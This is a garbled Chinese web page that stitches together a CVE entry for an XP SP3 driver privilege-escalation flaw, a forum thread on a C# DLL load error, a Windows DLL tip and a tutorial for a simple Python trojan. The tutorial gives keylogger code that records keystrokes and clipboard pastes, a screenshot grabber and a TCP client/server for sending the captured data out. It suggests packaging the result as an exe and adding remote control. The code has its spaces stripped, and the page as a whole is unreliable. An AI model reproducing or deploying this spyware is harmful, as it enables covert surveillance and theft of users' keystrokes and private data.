windll.psapiwin10模块dll加载失败有什么作用

CVE-漏洞详情 - SCAP中文社区
CVE&&通用漏洞与披露Common Vulnerabilities and Exposures
发布时间&: 11:55:04
修订时间&: 22:00:24
[原文]Microsoft Windows XP SP3 does not validate addresses in certain IRP handler routines, which allows local users to write data to arbitrary memory locations, and consequently gain privileges, via a crafted address in an IOCTL call, related to (1) the MQAC.sys driver in the MQ Access Control subsystem and (2) the BthPan.sys driver in the Bluetooth Personal Area Networking subsystem.
[CNNVD]Microsoft Windows XP SP3 安全漏洞()&&&&&&&&Microsoft Windows XP SP3是美国微软(Microsoft)公司的一个XP操作系统的补丁升级包。
Microsoft Windows XP SP3版本的MQ Access Control子系统中的MQAC.sys驱动程序和Bluetooth Personal Area Networking子系统中的BthPan.sys驱动程序存在安全漏洞,该漏洞源于程序没有验证某些IRP处理程序例程中的地址。本地攻击者可借助IOCTL调用中特制的地址利用该漏洞在任意内存位置写入数据,获取特权。
CVSS (基础分值)
[严重(HIGH)]
机密性影响:
[完全的信息泄露导致所有系统文件暴露]
完整性影响:
[系统完整性可被完全破坏]
可用性影响:
[可能导致系统完全宕机]
攻击复杂度:
[漏洞利用没有访问限制 ]
[漏洞利用需要具有物理访问权限或本地帐户]
[漏洞利用无需身份认证]
CWE (弱点类目)
[输入验证不恰当]
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用
OVAL (用于检测的技术细节)
MQAC arbitrary write privilege escalation vulnerability - CVE- (MS14-062)*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。
官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD
其它链接及资源
(VENDOR_ADVISORY) &CONFIRM &/b/srd/archive//accessing-risk-for-the-october-2014-security-updates.aspx
(UNKNOWN) &MISC &/files/127535/Microsoft-XP-SP3-BthPan.sys-Arbitrary-Write-Privilege-Escalation.html
(UNKNOWN) &MISC &/files/127536/Microsoft-XP-SP3-MQAC.sys-Arbitrary-Write-Privilege-Escalation.html
(UNKNOWN) &MISC &/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html
(UNKNOWN) &FULLDISC & KL-001- : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
(UNKNOWN) &FULLDISC & KL-001- : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
(VENDOR_ADVISORY) &MS &MS14-062
(UNKNOWN) &EXPLOIT-DB &34112
(UNKNOWN) &EXPLOIT-DB &34131
(UNKNOWN) &EXPLOIT-DB &34982
(UNKNOWN) &BUGTRAQ & KL-001- : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
(UNKNOWN) &BUGTRAQ & KL-001- : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
(UNKNOWN) &BID &68764
(VENDOR_ADVISORY) &SECTRACK &1031025
(UNKNOWN) &MISC &/Resources/Advisories/KL-001-.txt
(UNKNOWN) &MISC &/Resources/Advisories/KL-001-.txt
公告与补丁
&&&&&&&&目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:
&&&&&&&&
漏洞信息 (F127536)
漏洞信息 (F127535)
漏洞信息 (F127618)
漏洞信息 (F128674)
受影响的程序版本
关于SCAP中文社区
SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[。
CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在。23:05 提问
无法加载 DLL“xxx.dll”: 找不到指定的模块。
我用C#写了一个程序,隐式调用了三个dll,暂且叫A.dll/B.dll/C.dll吧。这三个dll都是自己写的,使用的C++。其中B.dll中也调用了C.dll。现在的问题是在C#生成的exe中使用A.dll和C.dll都可以,但使用B.dll时却出现了下图的报错。
1. 网上有说是路径问题,我是把C#和三个dll的项目放在一个解决方案里的,生成路径都设置到了解决方案目录里的Debug目录,所以在引用时都直接写的dll名称,路径应该没问题,因为A.dll和C.dll都可以调用。
2. 网上也有说是我调用的dll引用了其他的dll,我用depends这个工具打开exe看了一下,如下图。首先,他没有依赖我自己写的这三个dll,这个很奇怪,然后提示我没有那8个红色的dll。我把这8个dll从网上下载了都放进exe所在的Debug文件夹下,再运行exe还是不行啊。
我看了很多网上这方面的资料,现在还是解决不了,请教大家这究竟应该怎么解决?
按赞数排序
找到原因了,不是常见的路径和依赖的问题,我仔细的看了一下我的B.dll的程序,发现我定义了一个结构体的指针,还没有给这个指针分配内存的时候就用这个指针来引用结构体内的成员了。奇怪的是编译器竟然没报错,而运行中出错竟然提示的是找不到dll。吸取教训,看来dll本身出错了,也会提示这个找不到dll。也多谢各位前辈的指导,csdn真是个不错的地方。
“隐式调用”是什么意思?你必须引用这些dll才行,如果是反射的话,需要Assembly.LoadFromFile加载
确保你的主程序和dll都是同一平台,比如都是x86,不要有的是x86有的是x64。
然后确保你以管理员方式运行程序。将dll复制到system32(如果是x64,并且是32bit,放在syswow64)
既然有dll可以,b不行,那么就看看几个dll工程配置,依赖,路径等是否有区别。
可能B的依赖项有问题。
也可以试试先不让 B 依赖于 C,对 B 进行调用看看是否是这方面的问题。
其他相似问题解决Win7驱动安装dll模块文件丢失问题
& 使用Windows7系统进行驱动程序安装时,有用户会遇到&找不到指定模块&或&XXX.dll文件丢失&的错误提示,那么究竟是什么原因导致此类错误的发生呢?这是由于程序安装时,一般都是优先从自己的安装目录中调用所需的.dll模块文件,如果安装目录中没有所需要的文件,程序便会到Windows\System32文件夹中调用,假如Windows\System32文件夹中也没有需要的文件,便会出现上述的错误提示信息。
& 解决上述错误的方法是,只要程序与Windows7系统兼容,就可以在Winsxs文件夹中找到这些所需的.dll模块文件,然后,将它们复制到Windows\System32文件夹中即可解决,操作方法如下:
& 1.打开&开始菜单&在搜索框中键入&cmd&,接着右键上方出现的程序图标,选择&以管理员身份运行&。
& 2.在cmd命令窗口内,先键入cd\按回车,再键入dir aeevts.dll /s按回车,注意:这里的aeevts.dll是代表需要寻找的.dll模块文件。
& 3.接下来,在窗口中会显示出系统中所有的aeevts.dll模块文件路径,将其中某一文件路径记录下来,然后,找到对应的相关aeevts.dll模块文件并复制。
& 4.将复制的aeevts.dll模块文件直接复制到C:\Windows\System32文件夹中,最后,重新进行驱动程序安装即可。
提示:更多WIN7系统资源尽在 Win7之家
http://www.win7zhijia.net 欢迎收藏下载。
win7之家系统教程排行
win7之家系统教程推荐本文属于《小学生科普系列》番外篇,《小科》系列面向小学生,纯科普,大牛莫喷~文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马,依然选用Sublimetext2+JEDI(python自动补全插件)来写代码。首先准备好我们需要的依赖库,pythonhook和pythoncom。
如果觉得麻烦,你可以直接使用集成了所有我们所需要的python库的商业版Activepython。记录你所敲打的一切:编写一个keylogger说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了。抛开高科技,我们暂且回归本质,探探简易键盘记录器的原理与实现。Pythonkeylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windowsAPI的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。关键代码如下所示:
#-*-coding:utf-8-*-
fromctypesimport*
importpythoncom
importpyHook
importwin32clipboard
user32=windll.user32
kernel32=windll.kernel32
psapi=windll.psapi
current_window=None
defget_current_process():
#获取最上层的窗口句柄
hwnd=user32.GetForegroundWindow()
#获取进程ID
pid=c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(pid))
#将进程ID存入变量中
process_id=%d%pid.value
executable=create_string_buffer(\x00*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
#读取窗口标题
windows_title=create_string_buffer(\x00*512)
length=user32.GetWindowTextA(hwnd,byref(windows_title),512)
print[PID:%s-%s-%s]%(process_id,executable.value,windows_title.value)
#关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
#定义击键监听事件函数
defKeyStroke(event):
globalcurrent_window
#检测目标窗口是否转移(换了其他窗口就监听新的窗口)
ifevent.WindowName!=current_window:
current_window=event.WindowName
get_current_process()
#检测击键是否常规按键(非组合键等)
ifevent.Ascii32andevent.Ascii127:
printchr(event.Ascii),
#如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
ifevent.Key==V:
win32clipboard.OpenClipboard()
pasted_value=win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print[PASTE]-%s%(pasted_value),
print[%s]%event.Key,
#循环监听下一个击键事件
returnTrue
#创建并注册hook管理器
kl=pyHook.HookManager()
kl.KeyDown=KeyStroke
#注册hook并执行
kl.HookKeyboard()
pythoncom.PumpMessages()
【知识点】钩子(Hook):Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。编写代码时一定要注意严格区分大小写,检查无误后启动keylogger,然后可以尝试打开记事本写点东西,过程中可以看到我们的keylogger窗口正在对我们的输入实时记录,如图1所示。
切换窗口时会自动跟踪到新窗口,light教授趁机骚扰一下疯狗,可以看到我们的keylogger已经跟踪到QQ聊天窗口,并忠实的记录下输入的一切,如图2所示。
看看你在干什么:编写一个screenshotter截屏实现起来更简单,直接调用几个GUI相关的API即可,我们直接看代码。
#-*-coding:utf-8-*-
importwin32gui
importwin32ui
importwin32con
importwin32api
hdesktop=win32gui.GetDesktopWindow()
#分辨率适应
width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
#创建设备描述表
desktop_dc=win32gui.GetWindowDC(hdesktop)
img_dc=win32ui.CreateDCFromHandle(desktop_dc)
#创建一个内存设备描述表
mem_dc=img_dc.CreateCompatibleDC()
#创建位图对象
screenshot=win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc,width,height)
mem_dc.SelectObject(screenshot)
#截图至内存设备描述表
mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)
#将截图保存到文件中
screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
运行之后看看效果如何,如图3所示。
综合运用:完成一个简易木马
无论是keylogger记录下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需要构建一个简单server和client端来进行通信,传输记录下的内容到我们的服务器上。
1)编写一个简单的TCPclient
#-*-coding:utf-8-*-
importsocket
#目标地址IP/URL及端口
target_host=127.0.0.1
target_port=9999
#创建一个socket对象
client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target_host,target_port))
client.send(GET/HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n)
response=client.recv(4096)
printresponse
2)编写一个简单的TCPserver
#-*-coding:utf-8-*-
importsocket
importthreading
#监听的IP及端口
bind_ip=127.0.0.1
bind_port=9999
server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print[*]Listeningon%s:%d%(bind_ip,bind_port)
defhandle_client(client_socket):
request=client_socket.recv(1024)
print[*]Received:%s%request
client_socket.send(ok!)
client_socket.close()
whileTrue:
client,addr=server.accept()
print[*]Acceptconnectionfrom:%s:%d%(addr[0],addr[1])
client_handler=threading.Thread(target=handle_client,args=(client,))
client_handler.start()
开启服务端监听,如图4所示。
执行客户端,如图5所示。
服务端接收到客户端的请求并做出了响应,如图6所示。
最后需要做的就是把上面三个模块结合起来,一个简易的具有键盘记录、屏幕截图并可以发送内容到我们服务端的木马就完成了。可以使用py2exe把脚本生成exe可执行文件。当然,你还可以继续发挥,加上远程控制功能。

我要回帖

更多关于 psapi.dll下载 的文章

 

随机推荐